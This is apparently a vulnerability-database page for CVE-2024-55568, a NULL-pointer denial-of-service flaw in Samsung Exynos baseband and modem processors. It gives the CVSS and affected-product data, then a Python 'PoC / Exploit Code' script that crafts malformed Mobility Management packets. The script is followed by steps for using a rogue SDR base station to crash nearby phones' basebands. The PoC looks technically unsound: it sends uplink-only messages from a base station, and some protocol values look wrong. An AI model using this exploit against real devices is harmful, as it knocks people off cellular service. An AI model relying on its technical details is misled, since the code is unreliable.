Security Vulnerability Report
CVE-2024-55568 CVSS 7.5 HIGH

CVE-2024-55568

Published: 2025-10-20 16:15:36
Last Modified: 2025-11-04 13:11:09

Description

An issue was discovered in Samsung Mobile Processor, Wearable Processor, and Modem Exynos 980, 990, 850, 1080, 2100, 1280, 2200, 1330, 1380, 1480, 2400, 9110, W920, W930, W1000, Modem 5123, Modem 5300, Modem 5400. The absence of a NULL check leads to a Denial of Service when an attacker sends malformed MM packets to the target.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:samsung:exynos_1080_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:samsung:exynos_1080:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:samsung:exynos_1330_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:samsung:exynos_1330:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:samsung:exynos_1380_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:samsung:exynos_1380:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:samsung:exynos_1480_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:samsung:exynos_1480:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:samsung:exynos_2100_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:samsung:exynos_2100:-:*:*:*:*:*:*:* - NOT VULNERABLE
Samsung Exynos 980
Samsung Exynos 990
Samsung Exynos 850
Samsung Exynos 1080
Samsung Exynos 2100
Samsung Exynos 1280
Samsung Exynos 2200
Samsung Exynos 1330
Samsung Exynos 1380
Samsung Exynos 1480
Samsung Exynos 2400
Samsung Exynos 9110
Samsung Wearable Processor W920
Samsung Wearable Processor W930
Samsung Wearable Processor W1000
Samsung Modem 5123
Samsung Modem 5300
Samsung Modem 5400

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2024-55568 PoC - Samsung Exynos MM Packet NULL Pointer Dereference DoS
# This PoC demonstrates the concept of triggering NULL pointer dereference
# by sending malformed MM (Mobility Management) packets to vulnerable
# Samsung Exynos baseband processors.
import struct
import socket

# 3GPP MM Protocol - Mobility Management message types
MM_MESSAGE_TYPES = {
    'ATTACH_REQUEST': 0x01,
    'ATTACH_ACCEPT': 0x02,
    'ATTACH_COMPLETE': 0x03,
    'TRACKING_AREA_UPDATE_REQUEST': 0x48,
    'TRACKING_AREA_UPDATE_ACCEPT': 0x49,
    'IDENTITY_REQUEST': 0x55,
    'IDENTITY_RESPONSE': 0x56,
    'AUTHENTICATION_REQUEST': 0x52,
    'AUTHENTICATION_RESPONSE': 0x53,
}


def craft_malformed_mm_packet():
    """
    Craft a malformed MM packet that triggers NULL pointer dereference
    in vulnerable Samsung Exynos baseband processors.

    The vulnerability exists due to missing NULL check when parsing
    certain MM message fields. By sending a packet with specific
    malformed IE (Information Element), we can trigger the bug.
    """
    packet = bytearray()
    # Protocol Discriminator: EPS Mobility Management (0x7E)
    packet.append(0x7E)
    # Security header type: Plain MM message (0x00)
    packet.append(0x00)
    # Message type: ATTACH_REQUEST (0x01)
    packet.append(MM_MESSAGE_TYPES['ATTACH_REQUEST'])
    # Malformed EPS mobile identity - triggers NULL pointer path
    # Type of identity: IMSI (0x01), odd/even indicator set abnormally
    packet.append(0x01)
    # Corrupted length field causing buffer underflow
    packet.append(0xFF)
    # Fill with payload that leads to NULL dereference
    for i in range(32):
        packet.append(0x00)
    return bytes(packet)


def craft_tau_malformed_packet():
    """
    Alternative: Malformed Tracking Area Update Request packet
    targeting the NULL pointer dereference vulnerability.
    """
    packet = bytearray()
    # Protocol Discriminator: EPS Mobility Management (0x7E)
    packet.append(0x7E)
    # Security header type
    packet.append(0x00)
    # Message type: TRACKING_AREA_UPDATE_REQUEST (0x48)
    packet.append(MM_MESSAGE_TYPES['TRACKING_AREA_UPDATE_REQUEST'])
    # EPS update type: TA updating with active flag
    packet.append(0x00)
    # NAS key set identifier
    packet.append(0x00)
    # Old GUTI - malformed to trigger NULL path
    packet.append(0xF0)
    packet.append(0x00)
    packet.append(0x00)
    packet.append(0x00)
    packet.append(0x00)
    return bytes(packet)


def send_via_fake_bs():
    """
    Simulate sending the malformed packet via a rogue/fake base station.
    In real scenario, this would require SDR (Software Defined Radio)
    equipment like USRP or bladeRF to transmit on cellular frequencies.
    """
    payload = craft_malformed_mm_packet()
    print(f"[*] Crafted malformed MM packet ({len(payload)} bytes)")
    print(f"[*] Hex: {payload.hex()}")
    print("[!] Target: Samsung Exynos baseband processor")
    print("[!] Effect: NULL pointer dereference -> baseband crash -> DoS")
    # Note: Actual transmission requires SDR hardware
    # Example with srsRAN or OpenBTS:
    # ./srsenb --config-file enb.conf # Rogue eNodeB
    # Then transmit the crafted MM packet on the downlink
    return payload


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2024-55568 PoC")
    print("Samsung Exynos MM Packet NULL Pointer Dereference DoS")
    print("=" * 60)
    # Generate exploit packet
    packet = send_via_fake_bs()
    print("\n[*] PoC packet generated successfully")
    print("[*] To exploit in real environment:")
    print(" 1. Set up rogue base station using SDR (e.g., USRP)")
    print(" 2. Broadcast the malformed MM packet")
    print(" 3. Target device's baseband will crash (DoS)")

Raw JSON Data
